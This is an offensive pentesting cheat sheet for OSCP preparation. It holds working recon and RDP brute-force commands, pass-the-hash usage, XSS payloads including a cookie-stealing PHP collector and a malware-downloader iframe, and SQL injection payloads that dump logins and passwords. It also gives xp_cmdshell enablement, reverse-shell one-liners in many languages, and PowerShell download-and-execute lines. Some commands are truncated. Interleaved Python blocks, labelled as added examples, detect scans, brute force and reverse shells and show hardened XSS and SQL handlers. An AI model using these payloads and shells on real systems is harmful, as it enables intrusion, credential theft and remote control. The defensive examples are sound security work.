Comprehensive Pentesting Cheat Sheet

This document provides a collection of code snippets and commands to help with penetration testing and OSCP preparation. It includes sections on reconnaissance, exploitation, post-exploitation, and resources. Specific tools and techniques are outlined for tasks like DNS enumeration, port scanning with Nmap, exploiting SQL injection, and establishing reverse shells. The goal is to help pentesters complete common security assessments without relying on Metasploit.

Uploaded by Adu Singh

This repo has a collection of snippets of code and commands to make our lives easier!

The main purpose is not to be a crutch; this is a way to not waste our precious time! This repo also helps those trying to get the OSCP. You'll find many ways to do things without the Metasploit Framework.

Ninja Tricks

Recon
DNS
SPF
Nmap
NetCat
SNMP
Mysql
MS SQL
Web Enumeration
Exploitation
System Network
RDP
Pass The Hash
Windows-Shell
Web Application
Web Remote Code Execution
LFI
encode
XSS
SQLi
sqlmap
Bare Hands
Jenkins
Post-exploitation
Reverse Shell
PHP Reverse Shell
Perl Reverse Shell
python Reverse Shell
Ruby Reverse Shell
bash Reverse Shell
powershell Reverse Shell
Java Reverse Shell
Xterm Reverse Shell
Linux
Linux Privilege Escalation
Data Harvesting and Enumeration
Linux Pivot
Sshuttle
VPNPivot
SSH Tunneling
Linux Backdooring
Windows
Windows Enumeration
Windows Privilege Escalation
Hashdump
Transferring Files Without Metasploit
Backdooring
Windows Pivot
Openssh for Tunneling
Plink
Resources
HTTP/HTTPS Servers
Wordlist
seclist
cotse
PacketStorm
Default Passwords
Default Password
Router Password
Leak
Pastebin
Tables
Contribution

Recon

DNS

Nslookup
Resolve a given hostname to the corresponding IP.

nslookup [Link]

Reverse DNS lookup

nslookup -type=PTR IP_address

MX (Mail Exchange) lookup

nslookup -type=MX domain

Zone Transfer

Using nslookup Command

nslookup
server [Link]
ls -d [Link]
Using HOST Command

host -t ns(Name Server) < domain >

host -t ns [Link]

After that, test the nameservers:

host -l < domain > < nameserver >

host -l [Link] [Link]

Nmap DNS Enumeration

nmap -F --dns-server <dns server ip> <target ip range>

Auto tools

DNSenum

dnsenum [Link]

dnsenum --target_domain_subs.txt -v -f [Link] -u a -r [Link]

DNSmap

[Link]

dnsmap [Link] -w <Wordlist [Link]>

Brute force; the output file is saved in /tmp

dnsmap [Link] -r

DNSRecon DNS Brute Force


dnsrecon -d TARGET -D /usr/share/wordlists/[Link] -t std --xml [Link]

[Link]

fierce -dns [Link]

HostMap

[Link] -only-passive -t <IP>

We can use -with-zonetransfer or -bruteforce-level

SPF Recon

Dig SPF txt

dig txt [Link]

Dmarc

dig TXT _dmarc.[Link]

Online Tools

[Link]
[Link]
[Link]
[Link]

Nmap

Set the IP address and network as variables

export ip=[Link]
export netw=[Link]/24


Detecting Live Hosts
Only IPs

nmap -sn -n $netw | grep for | cut -d" " -f5

Stealth Scan

nmap -sS $ip

Only Open Ports and Banner Grab

nmap -n -Pn -sS $ip --open -sV

Stealth scan using FIN Scan

nmap -sF $ip

Aggressive scan
No ping, no DNS resolution, show only open ports, and test all TCP ports

nmap -n -Pn -sS -A $ip --open -p-

Nmap verbose scan: runs SYN stealth scan, T4 timing, OS and service version detection, traceroute and scripts against services

nmap -v -sS -A -T4 $ip

OS Fingerprint

nmap -O $ip

Quick Scan

nmap -T4 -F $netw


Quick Scan Plus

nmap -sV -T4 -O -F --version-light $netw

Output to a file

nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip

Output to a file Plus

nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw

Search NMAP scripts

ls /usr/share/nmap/scripts/ | grep ftp

Nmap Discovery

NetCat

Port Scanner
One port

nc -nvz [Link] 80

Port Range

nc -vnz [Link] 0-1000

Send files
Server
nc -lvp 1234 > file_name_to_save

Client

nc -vn [Link] 1234 < file_to_send

Executing remote script


Server

nc -lvp 1234 -e [Link] <IP>

Client

nc -vn [Link] 1234

Chat with encryption


Server

ncat -nlvp 8000 --ssl

Client

ncat -nv [Link] 8000

Banner Grabbing
Request

nc target port
HTTP_Verb path http/version
Host: url

Response
nc [Link] 80
HEAD / HTTP/1.0
Host: [Link]

If this site uses https you need to use openssl

openssl s_client -quiet [Link]

SNMP

Fixing SNMP output

apt-get install snmp-mibs-downloader
download-mibs

echo "" > /etc/snmp/[Link]

OneSixtyone
onesixtyone -c COMMUNITY_FILE -i Target_ip

onesixtyone -c [Link] -i Found_ips.txt

snmpwalk
Walking MIBs

snmpwalk -c COMMUNITY -v VERSION target_ip

snmpwalk -c public -v1 [Link]

Specific MIB node:

snmpwalk -c COMMUNITY -v VERSION target_ip MIB_NODE

Example: USER ACCOUNTS = [Link].[Link].2.25

snmpwalk -c public -v1 [Link] [Link].[Link].2.25


snmp-check
snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY

snmp-check -t [Link]

snmp-check -t [Link] -c public

Automate the username enumeration process for SNMPv3

apt-get install snmp snmp-mibs-downloader

wget [Link]

NMAP SNMPv3 Enumeration

nmap -sV -p 161 --script=snmp-info [Link]/24

Default Credentials

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

MYSQL

Try remote default root access

MySQL open to the wild:

mysql -h Target_ip -u root -p

MSSQL
MSSQL Information Gathering

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-

Web Enumeration

Dirsearch

dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old

dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist

dirsearch -u [Link] -e .

dirb

dirb [Link] /path/to/wordlist

dirb [Link] /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.p

Gobuster

gobuster -u [Link] -w /usr/share/wordlists/dirb/[Link]

Exploitation

System Network

RDP
xfreerdp

Simple User Enumeration for Windows Target (kerberos based)

xfreerdp /v:<target_ip> -sec-nla /u:""

xfreerdp /v:[Link] -sec-nla /u:""

Login
xfreerdp /u: /g: /p: /v:<target_ip>

xfreerdp /u:administrator /g:grandbussiness /p:bla /v:[Link]

Wordlist-based brute force

NCRACK
ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389

ncrack -vv --user user -P [Link] [Link]:3389

Crowbar
crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v

crowbar -b rdp -u user -C password_wordlist -s [Link]/32 -v
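The Nmap scans above and the RDP wordlist attacks in this section both leave a very recognisable footprint on the target side: one source hitting many distinct ports in a short window, or one source failing many logons in a short window. The following is an added example, not code from the original cheat sheet or its repository, of a small sliding-window detector that covers both cases. The log formats (an iptables-style SYN log and flattened Windows event 4625 records), the IP addresses, the rule names and the thresholds are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data (not from the original page).
# 1) iptables-style SYN log as an "nmap -sS" of one host would leave behind: twelve
#    different destination ports from 203.0.113.5 in twelve seconds, plus two ordinary
#    connections from 198.51.100.7.
SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3389]
FIREWALL_LOG = "\n".join(
    f"2024-01-10T10:00:{i:02d} IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 "
    f"PROTO=TCP SPT={40000 + i} DPT={p} SYN"
    for i, p in enumerate(SCAN_PORTS)
) + """
2024-01-10T10:00:30 IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=443 SYN
2024-01-10T10:05:12 IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=51001 DPT=80 SYN
"""

# 2) Flattened Windows Security events (4625 = failed logon, LogonType 10 = RDP) as an
#    ncrack/crowbar wordlist run would leave: six failures for one account from 203.0.113.9
#    in twenty seconds, plus one mistyped password from 198.51.100.7.
RDP_LOG = "\n".join(
    f"2024-01-10T11:00:{4 * i:02d} EventID=4625 TargetUserName=administrator "
    f"IpAddress=203.0.113.9 LogonType=10"
    for i in range(6)
) + """
2024-01-10T11:30:00 EventID=4625 TargetUserName=alice IpAddress=198.51.100.7 LogonType=10
"""

FW_RE = re.compile(r"^(?P<ts>\S+) IN=\S+ SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
                   r"PROTO=TCP SPT=\d+ DPT=(?P<dport>\d+) SYN$")
RDP_RE = re.compile(r"^(?P<ts>\S+) EventID=4625 TargetUserName=(?P<user>\S+) "
                    r"IpAddress=(?P<src>\S+) LogonType=10$")


def find_bursts(events, window_seconds, threshold):
    """events: (timestamp, group_key, value) tuples. For every group, slide a time window
    over its events and count the distinct values inside it. Returns
    {group_key: (window_start, distinct_count)} for groups whose best window reaches
    the threshold."""
    by_group = defaultdict(list)
    for ts, key, value in events:
        by_group[key].append((ts, value))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for key, items in by_group.items():
        items.sort()
        best_count, best_start = 0, None
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {v for _, v in items[start:end + 1]}
            if len(distinct) > best_count:
                best_count, best_start = len(distinct), items[start][0]
        if best_count >= threshold:
            alerts[key] = (best_start, best_count)
    return alerts


def detect_port_scans(log_text, window_seconds=60, threshold=10):
    """Port scan: one (src, dst) pair touching >= threshold distinct ports per window."""
    events = []
    for line in log_text.splitlines():
        m = FW_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), (m["src"], m["dst"]), int(m["dport"])))
    return find_bursts(events, window_seconds, threshold)


def detect_rdp_bruteforce(log_text, window_seconds=300, threshold=5):
    """RDP brute force: one source producing >= threshold failed RDP logons per window.
    Each failure gets a unique value (its sequence number) so the distinct count is the
    failure count."""
    events = []
    for seq, line in enumerate(log_text.splitlines()):
        m = RDP_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], seq))
    return find_bursts(events, window_seconds, threshold)


if __name__ == "__main__":
    print("port scans:", detect_port_scans(FIREWALL_LOG))
    print("rdp brute force:", detect_rdp_bruteforce(RDP_LOG))
```

The thresholds are deliberately conservative (ten distinct ports in a minute, five RDP failures in five minutes); on real telemetry they need tuning against known scanners and monitoring hosts, and the same sliding-window routine can be pointed at any (time, source, thing) triple, such as distinct usernames per source for password-spray detection.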

Pass the hash

Smb pass the hash

Tool:

pth-toolkit
Listing shared folders
sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L <target_ip> \\<target_ip>\

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L [Link] \\\\192.168.0

Interactive smb shell


sudo pth-smbclient --user= --pw-nt-hash -m smb3 \\<target_ip>\shared_folder

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\[Link]\\folder

Web Application

Web Remote code

LFI (Local File Inclusion)


Situation

[Link]

How to Test

[Link]

[Link]

[Link]

LFI Payloads

Payload All the Things


Seclist LFI Intruder
encode

XSS

Reflected

Simple test

This is a simple test to see what happens; it is not proof that the field is vulnerable to XSS.

<plaintext>

Simple XSS test

<script>alert('Found')</script>

"><script>alert('Found')</script>">

<script>alert([Link](88,83,83))</script>

Bypass filter of tag script

" onload="alert([Link](88,83,83))

" onload="alert('XSS')

bla is not a valid image, so this causes an error

<img src='bla' onerror=alert("XSS")>

Persistent

>[Link]="<style>body{visibility:hidden;}</style><div style=visibili

PHP collector
> [Link] chmod 777 [Link]

Edit a PHP page like [Link] as follows:

<?php
// Read the cookie passed as a GET parameter and the visitor's User-Agent
$cookie = $_GET['cookie'];
$useragent = $_SERVER['HTTP_USER_AGENT'];
// Append one line per hit to the log file
$file = fopen('[Link]', 'a');
fwrite($file, "USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>

Script to put in page:

<script>new Image().src="[Link]

Malware Downloader via XSS

<iframe src="[Link] height="0" width="0"></iframe>

How to play Mario with XSS

<iframe
src="[Link]
width="100%"
height="600"
></iframe>

<input onfocus="[Link]=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2

XSS payloads

Payload All The Things


Seclist XSS
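The probes in this section work because the application reflects input into HTML without encoding it for the context it lands in: a bare `<script>` works in body text, while `" onload="...` works by closing the surrounding attribute. The following is an added example, not code from the original cheat sheet or its repository, of a vulnerable reflection handler beside its hardened form, with a small parser-based audit that reports which probes actually become tags or event handlers. The template, the handler names and the probe list are constructed for this example; the probes themselves are the ones listed above.

```python
import html
from html.parser import HTMLParser

# Reflected-XSS probes from the cheat sheet above (the page's own test strings).
PAYLOADS = [
    "<plaintext>",
    "<script>alert('Found')</script>",
    "\"><script>alert('Found')</script>\">",
    "\" onload=\"alert('XSS')",
    "<img src='bla' onerror=alert(\"XSS\")>",
]

# Hypothetical search page: the query is reflected both inside an attribute value and in body text.
TEMPLATE = '<input type="text" name="q" value="{q}"><p>Results for {q}</p>'
EXPECTED_TAGS = {"input", "p"}


def render_unsafe(query):
    """Vulnerable handler: raw input is spliced straight into the markup."""
    return TEMPLATE.format(q=query)


def render_safe(query):
    """Hardened handler: html.escape(quote=True) turns < > & " ' into entities, so the
    input can neither close the value="..." attribute nor open a new tag."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


class MarkupAudit(HTMLParser):
    """Records the tags and on* event-handler attributes a browser would actually parse."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def audit(page_html):
    """Return (unexpected tags, event-handler attributes) present in the rendered page."""
    parser = MarkupAudit()
    parser.feed(page_html)
    parser.close()
    return sorted(set(parser.tags) - EXPECTED_TAGS), sorted(set(parser.handlers))


def compare(payloads=PAYLOADS):
    """For each probe: what the vulnerable and the hardened handler let through."""
    return {p: (audit(render_unsafe(p)), audit(render_safe(p))) for p in payloads}


if __name__ == "__main__":
    for probe, (unsafe, safe) in compare().items():
        print(f"{probe!r}\n  unsafe -> {unsafe}\n  safe   -> {safe}")
```

Note that a regex looking for the string `onload=` would still flag the hardened output, because the escaped text is literally present inside the attribute value; parsing the result the way a browser does is what shows that no handler attribute exists. Encoding must match the context (attribute, body, URL, JavaScript string), and the `<plaintext>` and `<img onerror>` cases show why filtering only the `script` tag is not a fix.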

SQLI
Sql Injection
Sqlmap

GET

Error-Based

Simple test

Adding a simple quote '

Example:

[Link]

List databases

./[Link] -u [Link] --dbs

List tables

./[Link] -u [Link] -D database_name --tables

List columns

./[Link] -u [Link] -D database_name -T table_name --columns

Dump all

./[Link] -u [Link] -D database_name -T table_name --dump-al

Set Cookie

./[Link] -u [Link] --cookie "Cookie: OV1364928461=6kb5jvu7f

Checking Privileges

./[Link] -u [Link] --privileges | grep FILE


Reading file

./[Link] -u <URL> --file-read=<file to read>

./[Link] -u [Link] --file-read=/etc/passwd

Writing file

./[Link] -u <url> --file-write=<file> --file-dest=<path>

./[Link] -u [Link] --file-write=[Link] --file-dest=/var/

POST

./[Link] -u <POST-URL> --data="<POST-parameters>"

./[Link] -u [Link] --data "uname=teste&passwd=&submit=Submi

You can also use a saved request file for the POST request:

./[Link] -r [Link] -p uname

Bare Hands

GET

Error-Based

Simple test

Adding a simple quote '

Example:

[Link]
Fuzzing

Sorting columns to find maximum column

[Link] order by 1

[Link] order by 2

[Link] order by 3

(until it stops returning errors)

Finding what column is injectable

mysql

[Link] union select 1, 2, 3

(using the same amount of columns you got on the previous step)

postgresql

[Link] union select NULL, NULL, NULL

(using the same amount of columns you got on the previous step)

one of the columns will be printed with the respective number

Finding version

mysql

[Link] union select 1, 2, version()

postgres

[Link] union select NULL, NULL, version()

Finding database name

mysql

[Link] union select 1,2, database()

postgres
[Link] union select NULL,NULL, database()

Finding usernames logged in

mysql

[Link] union select 1, 2, current_user()

Finding databases

mysql

[Link] union select 1, 2, schema_name from information_schema.schemata

postgres

[Link] union select 1, 2, datname from pg_database

Finding table names from a database

mysql

[Link] union select 1, 2, table_name from information_schema.

postgres

[Link] union select 1, 2, tablename from pg_tables where table

Finding column names from a table

mysql

[Link] union select 1, 2, column_name from information_schema.

postgres

[Link] union select 1, 2, column_name from information_schema.

Concatenate
Example:

[Link] union select 1, 2, login from users;


[Link] union select 1, 2, password from users;

In one query:

mysql

[Link] union select 1, 2, concat(login,':',password) from users;

postgres

[Link] union select 1, 2, login||':'||password from users;
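Every probe in this section depends on the application pasting the request parameter into the statement text. The following is an added example, not code from the original cheat sheet or its repository, showing a vulnerable lookup beside a parameterised one, using SQLite in memory so it runs offline. The schema, the handler names and the sample rows are constructed for this example; the `order by N` and `union select` strings are the ones described above.

```python
import sqlite3


def setup_db():
    """Constructed sample database: a products table the page queries and a users table
    the union probes read from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'bob', 's3cret');
    """)
    return conn


def product_unsafe(conn, product_id):
    """Vulnerable handler: the parameter is formatted into the SQL text, so whatever
    follows the number ("order by 3", "union select ...") is executed as SQL."""
    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchall()


def product_safe(conn, product_id):
    """Hardened handler: the value is validated as an integer and then bound with a
    placeholder, so it is only ever compared as data, never parsed as SQL."""
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, name, price FROM products WHERE id = ?", (pid,)).fetchall()


def column_count_via_order_by(conn, max_cols=20):
    """Replays the page's 'order by N' probe against the vulnerable handler: N is accepted
    until it exceeds the number of selected columns, at which point the database errors.
    The last accepted N is the column count the union payload must match."""
    count = 0
    for n in range(1, max_cols + 1):
        try:
            product_unsafe(conn, f"1 order by {n}")
        except sqlite3.OperationalError:
            break
        count = n
    return count


UNION_PROBE = "1 union select 1, 2, login||':'||password from users"

if __name__ == "__main__":
    db = setup_db()
    print("columns:", column_count_via_order_by(db))
    print("unsafe:", product_unsafe(db, UNION_PROBE))
    print("safe:  ", product_safe(db, UNION_PROBE))
```

The vulnerable handler returns the product row plus one row per user with `login:password` in the third column, exactly the concatenation trick shown above; the hardened one returns nothing for the probe and the single product row for a plain `1`. Binding alone already prevents the injection; the integer check in addition gives a clean rejection instead of a silent empty result.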

Error Based SQLI (USUALLY MS-SQL)

Current user

[Link] or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--

DBMS version

[Link] or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--

Database name

[Link] or db_name(0)=0 --

Tables from a database

[Link] or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--

[Link] or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--

Columns within a table

[Link] or 1 in (SELECT TOP 1 CAST(dbname..[Link] as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..[Link]=dbname..[Link] AND dbname..[Link] = 'tablename')--

Remember to change dbname and tablename according to the situation. After each iteration a new column name will be found; make sure to add it to the 'previously found column name' list, separated by commas, as in the next sample:

[Link] or 1 in (SELECT TOP 1 CAST(dbname..[Link] as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..[Link]=dbname..[Link] AND dbname..[Link] = 'tablename' AND dbname..[Link] NOT IN('previously found column name', ...))--

Actual data

[Link] or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--

After each iteration a new row value will be found; make sure to add it to the 'previously found row data' list, separated by commas, as in the next sample:

[Link] or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename WHERE columnName NOT IN('previously found row data'))--

Shell commands

EXEC master..xp_cmdshell <command>

You need to be the 'sa' user.

Enabling shell commands

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Jenkins

Post Exploitation

Reverse Shell

PHP Reverse Shell


php -r '$sock=fsockopen("[Link]",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Tiny Reverse Shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[Link]/1337 0>&1'");

Perl Reverse Shell

perl -e 'use Socket;$i="[Link]";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobynam

Python Reverse Shell

python -c 'import socket,subprocess,os;s=[Link](socket.AF_INET,socket.SOCK_ST

Ruby Reverse Shell

ruby -rsocket -e'f=[Link]("[Link]",1234).to_i;exec sprintf("/bin/sh -i <&%

Bash Reverse Shell

bash -i >& /dev/tcp/[Link]/8080 0>&1

Powershell Reverse Shell


Create a simple powershell script called reverse.ps1:

function reverse_powershell {
$client = New-Object [Link]("[Link]",80);$stream =
}

powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powe


Java Reverse Shell

r = [Link]()
p = [Link](["/bin/bash","-c","exec 5<>/dev/tcp/[Link]/2002;cat <&5 | while read li
[Link]()

Xterm Reverse Shell


One of the simplest forms of reverse shell is an xterm session. The following command should
be run on the server. It will try to connect back to you ([Link]) on TCP port 6001.

xterm -display [Link]:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to
do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip
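Each reverse shell in this section has a distinctive shape on the host it runs on: a shell with `/dev/tcp/` in its arguments, an interpreter one-liner that opens a socket and then calls `exec`, or an `xterm` pointed at a remote display. The following is an added example, not code from the original cheat sheet or its repository, of a small classifier that runs those indicators over a process listing. The rule names, the process table and the IP addresses are constructed for this example; the patterns are derived from the one-liners listed above.

```python
import re

# Indicator patterns for the reverse-shell one-liners listed above. Each is a regex over a
# process command line; the rule names are this example's own labels.
RULES = [
    ("bash-devtcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("php-fsockopen-exec", re.compile(r"fsockopen\(.*\bexec\(")),
    ("python-socket-dup2", re.compile(r"socket\.socket\(.*(?:os\.dup2|subprocess|pty\.spawn)")),
    ("perl-socket-exec", re.compile(r"use Socket;.*\bexec\b")),
    ("ruby-tcpsocket-exec", re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("xterm-remote-display", re.compile(r"\bxterm\b.*-display\s+\S+:\d+")),
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b")),
    ("interactive-shell-redirect", re.compile(r"\bsh -i\b.*[<>]&\d")),
]

# Constructed process listing (pid, user, command line), not real telemetry. The suspicious
# entries echo the page's one-liners; the Python one is shortened since only its prefix matters.
PROCS = [
    (1201, "root", "/usr/sbin/sshd -D"),
    (2310, "www-data", "bash -i >& /dev/tcp/198.51.100.7/8080 0>&1"),
    (2344, "www-data", "php -r '$sock=fsockopen(\"198.51.100.7\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"),
    (2400, "alice", "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                    "s.connect((\"198.51.100.7\",1234));os.dup2(s.fileno(),0);...'"),
    (2450, "bob", "xterm -display 198.51.100.7:1"),
    (2500, "alice", "python -m http.server 8000"),
    (2600, "www-data", "nc -lvp 1234 -e /bin/sh"),
    (2700, "bob", "xterm -geometry 80x24"),
]


def classify(cmdline):
    """Return the names of every rule that matches the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_processes(procs=PROCS):
    """Map pid -> (user, matched rules) for every process that trips at least one rule."""
    findings = {}
    for pid, user, cmd in procs:
        hits = classify(cmd)
        if hits:
            findings[pid] = (user, hits)
    return findings


if __name__ == "__main__":
    for pid, (user, hits) in scan_processes().items():
        print(f"pid {pid} ({user}): {', '.join(hits)}")
```

Command-line matching is cheap and catches the textbook one-liners, but it is easy to evade with encoding or renamed binaries; in practice it should be paired with a network-side view (a web-server or database account opening an outbound TCP connection to an external address is suspicious regardless of what the process is called).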

Linux

Windows

Transferring Files Without Metasploit

Powershell

Download files with powershell

powershell -c "Invoke-WebRequest -uri '[Link] -OutFil


powershell iex (New-Object [Link]).DownloadString('[Link]

powershell "(New-Object [Link]).Downloadfile('[Link]

Creating a server with python3

python -m [Link]

Creating a server with python2

python -m SimpleHTTPServer 80

FTP

You need to create an FTP server

Server Linux Allow anonymous

python -m pyftpdlib -p 21 -u anonymous -P anonymous

Windows Client

ftp
open target_ip port
open [Link] 21

We can simply run ftp -s:ftp_commands.txt to download a file with no user interaction, like this:

C:\Users\kitsunesec\Desktop>echo open [Link]>ftp_commands.txt


C:\Users\kitsunesec\Desktop>echo anonymous>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>echo whatever>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>ftp -s:ftp_commands.txt

Apache Server

Server: put your files into /var/www/html


cp [Link] /var/www/html
systemctl start apache2

Client

Get via web browser, wget or powershell...

Windows Pivoting

Openssh for Tunneling

Once you have SYSTEM on the target machine, download openssh_for_windows and unzip it:

powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\[Link]' c:\<pa

Then install it:

powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\instal

Now if you need, just adjust the firewall rules to your needs:

powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (ss

Start the sshd service:

net start sshd

After these steps a regular SSH tunnel will suffice:

From your linux machine:

$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>

Done! You now have a SOCKS proxy to tunnel through!

Resources
HTTP/HTTPS Servers

HTTPS using Python

Create the Certificate:

openssl req -new -x509 -keyout [Link] -out [Link] -days 365 -nodes

Start the HTTPS Server

import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = [Link](('[Link]', 443), [Link]
[Link] = ssl.wrap_socket ([Link], certfile='./[Link]', server_side=T
httpd.serve_forever()

Wordlists

Wordlists
PacketStorm
SecList
cotse
Default Password
DefaultPassword
RouterPassword
Leak
Pastebin
Tables
RainbowCrack

Contribution

HOW TO
